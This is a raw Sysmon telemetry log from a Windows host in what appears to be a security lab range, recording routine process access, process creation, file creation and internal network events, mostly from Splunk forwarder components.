10341000x800000000000000035127556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:27.579{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:27.579{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-8293-613A-B296-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127554Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:27.579{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8293-613A-B296-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127553Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:27.564{B81B27B7-8293-613A-B296-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:28.993{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=90B77213958F94082BA0DC0711EAB057,SHA256=CFE21FDD7CE66849E704C8E9A7DCA30791E8805E56F9A4B7DAEA17169E7E9AE1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127565Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:28.924{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B74D6DBAB38A45C446371280A25A6A4A,SHA256=68999C35F3AD065DD3799EF997680D298045DEBB10EC465034CCA7C07A946B8B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127568Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:29.942{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80CA88EDE301FD0A533520F65AD76F8C,SHA256=0FF36E796E1E68400637D0D7577F4233EF16BFFA069BB1B11D57157CACA7E42A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:54.120{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62045-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127570Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:30.959{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4449323CFB4E6B2A39A0BADC5A274603,SHA256=6FC73533AAD482D4E626B6175CA64F63581060981B060677458AD7BA5BB91007,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127569Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:55.256{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62046-false10.0.1.12-8000- 23542300x800000000000000035127571Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:31.974{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFB11916FAA82DB9DC11E4B49C65DEC4,SHA256=13235ABDF8F27725E26EC671E72C46D51F742E1085D2B83877506CA17C56AD5C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:33.072{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6E11AA86D278A3571DD82051EE24926,SHA256=411585374131D19090F4D0CC887F28001075BC77F79F7855462D69901CD3ACAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:33.039{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=404171AFBA4DF44193FF2F5F5369431D,SHA256=49A00F44C0ABCFBE290C7514C28785BB4AEE5B9978CF37BEF2C27D27ECCB7731,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:58.138{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62047-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:34.136{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=963BFA4DAADA97A4FDCFC3D0BBE05276,SHA256=B6AFBA615527220FDA743F62468FD98853C26EF0CC5467B188C74FA62E90B2EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:00.397{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62048-false10.0.1.12-8000- 23542300x800000000000000035127576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:35.157{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D27118D08AA62694CBB64A38283EFB7,SHA256=AC989CB5B7F8311FA82F7DE77738860C8A3C0B9A3E5A0408B4087FF54A653C2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:36.973{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7C39780B8EC49DB3257D33F63CA740D8,SHA256=B3F51AE01834C2E50A4F7804716E80EB10B2FEF56CC3CDE56A19378BB71A0CBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:36.172{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50CFE705A7AB35FE5A5F4784269D0DB9,SHA256=9F3AFB150A16AFDD9C3FA97179D6881FF13F61FC01C7DA21E36AC7E4FB810944,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:37.972{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=1A3007D1065823599F1A6AA704797A13,SHA256=06A2510ABE42B17874A5F2FE50B92D00FD87B12A53EAE535D5D3DE9A08CC078D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:02.152{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62049-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:37.173{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A433CF5E6A5CD54BEFA9658431E287D,SHA256=C5384D142F49196EC9B5D924C34267CF0A1A2F027BE1013EAB82CD3F8B78C3DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:38.603{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:38.603{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=C58B8651828B015F111F641E52FCB7B6,SHA256=CF4245DC244F48DC2E821C5EB4D8F360CAE0B3E524E6FC938388751C8D5D6526,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:38.203{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A22AC6D602A23A15A6077ED693197BAE,SHA256=3BDF9715F69306E3A4786832CDA04A88D762028B7E38C56BC54E5BF8249D9DEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:39.218{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD607596C703F2AEE2DD57E5A2AB6F45,SHA256=DC2E61424CC1FA119CA473A608026FB7F48B143A5C63FD98BCC1257A1F40652E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:40.884{B81B27B7-82A0-613A-B396-03000000C801}63323448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:40.736{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-82A0-613A-B396-03000000C801}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:40.734{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:40.734{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:40.733{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:40.733{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:40.733{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-82A0-613A-B396-03000000C801}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:40.733{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-82A0-613A-B396-03000000C801}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:40.717{B81B27B7-82A0-613A-B396-03000000C801}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:40.316{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4713798977F7C0E40B99743EDDFEB782,SHA256=AA5E62167A30F527A1F68148D5BC87B2C46E4B4A7502EC55DF9043C6C341456D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.984{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-82A1-613A-B596-03000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.984{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:41.984{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 